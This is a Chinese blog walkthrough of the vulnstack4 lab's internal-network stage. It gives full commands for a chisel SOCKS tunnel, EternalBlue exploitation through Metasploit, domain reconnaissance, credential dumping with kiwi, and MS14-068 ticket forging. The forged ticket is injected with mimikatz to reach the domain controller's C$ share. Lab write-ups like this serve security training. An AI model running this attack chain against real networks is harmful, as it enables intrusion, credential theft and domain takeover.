0
点赞
收藏
分享

微信扫一扫

vulnstack4 内网篇

伊人幽梦 2022-05-02 阅读 30

chisel+msf攻入内网

在kali上下载chisel再上传到Ubuntu上

目标服务器开启服务端

./chisel_1.7.6_linux_amd64 server -p 2333 --socks5

攻击机kali开启客户端

./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks

攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。

永恒之蓝横向渗透攻击

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.183.0/24

set threads 50

先扫描ip哪些存在此漏洞,发现192.168.183.1,192.168.183.128两个ip存在

对192.168.183.128进行攻击

set Proxies socks5:127.0.0.1:1080
     #msf全局把代理指向127.0.0.1:1080(攻击机1080端口进行socks5监听)
use exploit/windows/smb/ms17_010_eternalblue   #加载渗透攻击模块
set payload windows/x64/meterpreter/bind_tcp   #因为使用代理所以正向监听
                                                              
set  AutoRunScript post/windows/manage/migrate  #自动化后渗透测试,执行
                                                                 #   一次就可以获得对目标的控制权限
set rhost    192.168.183.128 #设置内网域成员为目标机
set lport 4444  #设置监听端口
run

攻击成功,直接为最高权限

进行简单内网收集

进入shell执行命令

shell                        #进入windows 命令行shell

net view        # 查看局域网内其他主机名

net view /domain  # 查看有几个域

net view  /domain:DEMO   #查看域中主机

 

域DEMO中有TESTWIN7-PC   和WIN-ENS2VR5TR3N两台主机。

net localgroup administrators     #查看本地管理员组

net group "domain controllers" /domain   #查看域控主机的名字

这种情况是必须域用户才能访问,非域用户没有权限执行域命令。我们需要降低权限到普通域用户,或者说模拟假冒普通域用户如/demodouser令牌。

再看whoami,已经降为域用户demo/douser

域控主机即domain controller 为WIN-ENS2VR5TR3N

wmic computersystem get domain  #完整域名

完整域名 demo.com

查看域控IP为192.168.183.130

查看域中的用户

 

存在3个域用户:

Administrator 、douser、 krbtrt

查看用户demo\douser的sid为

S-1-5-21-979886063-1111900045-1414766810-1107

再用systeminfo命令,查看信息

补丁信息

                           [01]: KB2491683

                           [02]: KB2534111

                           [03]: KB2564958

                           [04]: KB2621440

                           [05]: KB2653956

                           [06]: KB2654428

                           [07]: KB2698365

                           [08]: KB2705219

                           [09]: KB2736422

                           [10]: KB2813430

                           [11]: KB2900986

                           [12]: KB2937610

                           [13]: KB2943357

                           [14]: KB2978120

                           [15]: KB2984972

                           [16]: KB2992611

                           [17]: KB2999226

                           [18]: KB3004375

                           [19]: KB3010788

                           [20]: KB3023215

                           [21]: KB3031432

                           [22]: KB3035126

                           [23]: KB3037574

                           [24]: KB3045685

                           [25]: KB3046269

                           [26]: KB3072305

                           [27]: KB3074543

                           [28]: KB3086255

                           [29]: KB3097989

                           [30]: KB3101722

                           [31]: KB3108371

                           [32]: KB3122648

                           [33]: KB3127220

                           [34]: KB3155178

                           [35]: KB4019990

                           [36]: KB4040980

                           [37]: KB976902

渗透内网就要想到著名的域权限提升漏洞MS14-68,危害很大,可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。该靶机内网域有没有这个漏洞呢?通过对照相应漏洞补丁号:KB3011780,发现该域网没有装相应补丁,即可能存在MS14-68漏洞。下面我们利用此漏洞进攻域控。

信息搜集到此后,回到meterpreter执行rev2self恢复最高权限。

回到meterpreter,用rev2sel命令重新具有系统最高权限。

先使用msf中的kiwi模块

creds_all  #列举所有凭据

明文密码出现

 

查看桌面发现还有MS14-068.exe ,利用此漏洞提权

MS14-068.exe 利用方法

构造payload如下:

MS14-068.exe -u douser@demo.com -p Dotest123  -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

成功生成票据文件“TGT_douser@demo.com.ccache”!

使用mimikatz

 

mimikatz.exe      #启动Mimikatz
privilege::debug   #取得特权
kerberos::purge         #清空当前主机中所有凭证,否则会影响凭证伪造
kerberos::list           #查看当前机器凭证
kerberos::ptc  <生成的票据文件>      #将票据注入到内存中

 

票据注入内存

查看是否攻入域控

net use \\WIN-ENS2VR5TR3N

dir \\WIN-ENS2VR5TR3N\c$

 

dir \\WIN-ENS2VR5TR3N\c$

于是我们可以看到域控主机的文件,换句话说,我们已经拥有了域管理员权限。

后续:本来要继续生成黄金票据或白银票据维持权限,得到dc的明文密码,但是kali攻击机一直连不上,过后再更QAQ。

 

举报

相关推荐

0 条评论